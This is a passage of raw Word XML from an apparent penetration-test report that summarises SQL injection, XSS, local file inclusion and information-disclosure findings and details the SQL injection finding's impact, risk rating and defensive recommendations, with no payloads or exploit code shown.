              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="450DEC97" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A478DE7" w14:textId="0DA8704F" w:rsidR="009B42F8" w:rsidRDefault="007311D4">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261BDE51" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Finding 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6EE84EB3" w14:textId="518A2ED4" w:rsidR="009A7406" w:rsidRDefault="009A7406">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D336484" w14:textId="77777777" w:rsidR="00A708C7" w:rsidRDefault="00A708C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="162C8599" w14:textId="3FC707FC" w:rsidR="009B42F8" w:rsidRDefault="00A708C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Attackers can use SQLI on the search page to retrieve the whole database and get sensitive information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="6A9D8C01" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="423A2490" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">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4B997BA2" w14:textId="07EED661" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Finding </w:t>
            </w:r>
            <w:r w:rsidR="002A2C2D">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7EDD8E50" w14:textId="77777777" w:rsidR="002A2C2D" w:rsidRDefault="002A2C2D" w:rsidP="002A2C2D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14A982EF" w14:textId="77777777" w:rsidR="002A2C2D" w:rsidRDefault="002A2C2D" w:rsidP="002A2C2D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5A28CF17" w14:textId="4610C5A5" w:rsidR="00FE5DC5" w:rsidRDefault="002A2C2D" w:rsidP="002A2C2D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>XSS is available in the user profile, which allows attackers to inject malicious scripts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="25C6209E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3910FCB9" w14:textId="56E83405" w:rsidR="009B42F8" w:rsidRDefault="007311D4">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5BBC106F" w14:textId="385F05CF" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Finding </w:t>
            </w:r>
            <w:r w:rsidR="002A2C2D">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2DE529A7" w14:textId="77777777" w:rsidR="002A2C2D" w:rsidRDefault="002A2C2D" w:rsidP="002A2C2D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>LFI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B7BA7E9" w14:textId="77777777" w:rsidR="002A2C2D" w:rsidRDefault="002A2C2D" w:rsidP="002A2C2D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58CF5A40" w14:textId="0C7B14F9" w:rsidR="007311D4" w:rsidRDefault="002A2C2D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Attackers can exploit LFI to access to critical files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="6AD9724C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3CDE1F4C" w14:textId="7E9ECA7E" w:rsidR="009B42F8" w:rsidRDefault="00394AE3">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30636E8B" w14:textId="2896C577" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Finding </w:t>
            </w:r>
            <w:r w:rsidR="007311D4">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1DD67FFD" w14:textId="420FB2C6" w:rsidR="009B42F8" w:rsidRDefault="007311D4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Information Disclosure</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E78CED3" w14:textId="77777777" w:rsidR="007311D4" w:rsidRDefault="007311D4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71948C5B" w14:textId="6D5960B1" w:rsidR="007311D4" w:rsidRDefault="007311D4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Due to LFI, some sensitive information left in files are leaked to </w:t>
            </w:r>
            <w:r w:rsidR="002B66B8">
              <w:t>attackers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B07D20B" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6611B77A" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc131032147"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Detailed Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="50B8A819" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="5715ACAF" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:r>
        <w:t>This section provides detailed descriptions of all the vulnerabilities identified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E9B19" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="7AE11300" w14:textId="3DCDB258" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc131032148"/>
      <w:r>
        <w:t xml:space="preserve">Finding 1 </w:t>
      </w:r>
      <w:r w:rsidR="009A7406">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="009A7406">
        <w:t>SQLI on Search Page</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A2F032" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>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9B42F8" w14:paraId="5AE461D6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30E5781F" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="4" w:name="_gkehvzn9b6fl" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="5" w:name="_Toc131032149"/>
            <w:bookmarkEnd w:id="4"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E3DFB73" w14:textId="216D59CA" w:rsidR="009B42F8" w:rsidRDefault="009A7406">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>There is a</w:t>
            </w:r>
            <w:r w:rsidR="00FE5DC5">
              <w:t xml:space="preserve"> high</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> risk of </w:t>
            </w:r>
            <w:r w:rsidR="00FE5DC5">
              <w:t>a data breach occurring due to the SQL injection vulnerability on the search page.</w:t>
            </w:r>
            <w:r w:rsidR="007311D4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00FE5DC5">
              <w:t>It is highly likely that an attacker can successfully discover this vulnerability and gain access to the whole database</w:t>
            </w:r>
            <w:r w:rsidR="007311D4">
              <w:t xml:space="preserve">, which could </w:t>
            </w:r>
            <w:r w:rsidR="00FE5DC5">
              <w:t>bring significant legal liability and financial loss to the company.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="5D009BA7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="068A40B6" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="6" w:name="_hq8i3ex0izsy" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="7" w:name="_Toc131032150"/>
            <w:bookmarkEnd w:id="6"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:bookmarkEnd w:id="7"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00E14429" w14:textId="51929470" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:hyperlink w:anchor="_Appendix_2_-" w:history="1">
              <w:r w:rsidR="00FE5DC5" w:rsidRPr="002837A8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>See Appendix II Section I.</w:t>
              </w:r>
              <w:r w:rsidR="009713C1" w:rsidRPr="002837A8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve"> (1 flag)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="5DAEE72E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B604FCD" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="_d64klx18zxn" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="9" w:name="_Toc131032151"/>
            <w:bookmarkEnd w:id="8"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:bookmarkEnd w:id="9"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="38E253A0" w14:textId="4D0AA064" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">An attacker could </w:t>
            </w:r>
            <w:r w:rsidR="007311D4">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>retrieve sensitive data with this vulnerability, including personal identifying information, financial data, or other confidential information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="2FAA79F0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="19E7C98C" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="10" w:name="_i4aa8rrveh54" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="11" w:name="_Toc131032152"/>
            <w:bookmarkEnd w:id="10"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk Ratings</w:t>
            </w:r>
            <w:bookmarkEnd w:id="11"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6C2BC0AC" w14:textId="18DF4E14" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Extreme</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67DDF30B" w14:textId="50D84497" w:rsidR="009B42F8" w:rsidRDefault="002B66B8" w:rsidP="002B66B8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Easy to discover and </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>exploit</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="78FF3EFC" w14:textId="77777777" w:rsidR="002B66B8" w:rsidRDefault="0063656F" w:rsidP="002B66B8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Sensitive data could be leaked, e.g., user passwords</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="658B64E4" w14:textId="7E5CE873" w:rsidR="0063656F" w:rsidRDefault="0063656F" w:rsidP="002B66B8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Attacker can even modify or remove data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="2B12A8F8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3A14B05F" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="12" w:name="_jdmcc4uft8ar" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="13" w:name="_Toc131032153"/>
            <w:bookmarkEnd w:id="12"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="13"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5ED04322" w14:textId="719C51BE" w:rsidR="00C80541" w:rsidRDefault="009352A1" w:rsidP="00C80541">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Input validation and sanitisation</w:t>
            </w:r>
            <w:r w:rsidR="00C80541">
              <w:t xml:space="preserve">, e.g., escaping user </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00C80541">
              <w:t>inputs</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="21F6CE12" w14:textId="56DEC7C3" w:rsidR="009352A1" w:rsidRDefault="009352A1" w:rsidP="009352A1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Apply access controls</w:t>
            </w:r>
            <w:r w:rsidR="00C80541">
              <w:t xml:space="preserve">. Databases containing sensitive data, such as Secure and sys, should </w:t>
            </w:r>
            <w:r w:rsidR="00C80541">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:r w:rsidR="00C80541">
              <w:t xml:space="preserve">ave higher permission </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00C80541">
              <w:t>required</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="71C32B2F" w14:textId="52C523BD" w:rsidR="009B42F8" w:rsidRDefault="0063656F" w:rsidP="0063656F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Use prepared statements or stored procedures</w:t>
            </w:r>
            <w:r w:rsidR="00C80541">
              <w:t>. E.g., queries containing sensitive information should return 0.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="224D3D35" w14:textId="56922C67" w:rsidR="0063656F" w:rsidRDefault="0063656F" w:rsidP="0063656F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Use whitelist or blacklist for</w:t>
            </w:r>
            <w:r w:rsidR="000D068D">
              <w:t xml:space="preserve"> user</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>inputs</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="46BF1197" w14:textId="791DD37B" w:rsidR="0063656F" w:rsidRDefault="0063656F" w:rsidP="0063656F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="0854E587" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="05E90724" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="14" w:name="_xo5wgnnqiuz9" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="15" w:name="_Toc131032154"/>
            <w:bookmarkEnd w:id="14"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:bookmarkEnd w:id="15"/>
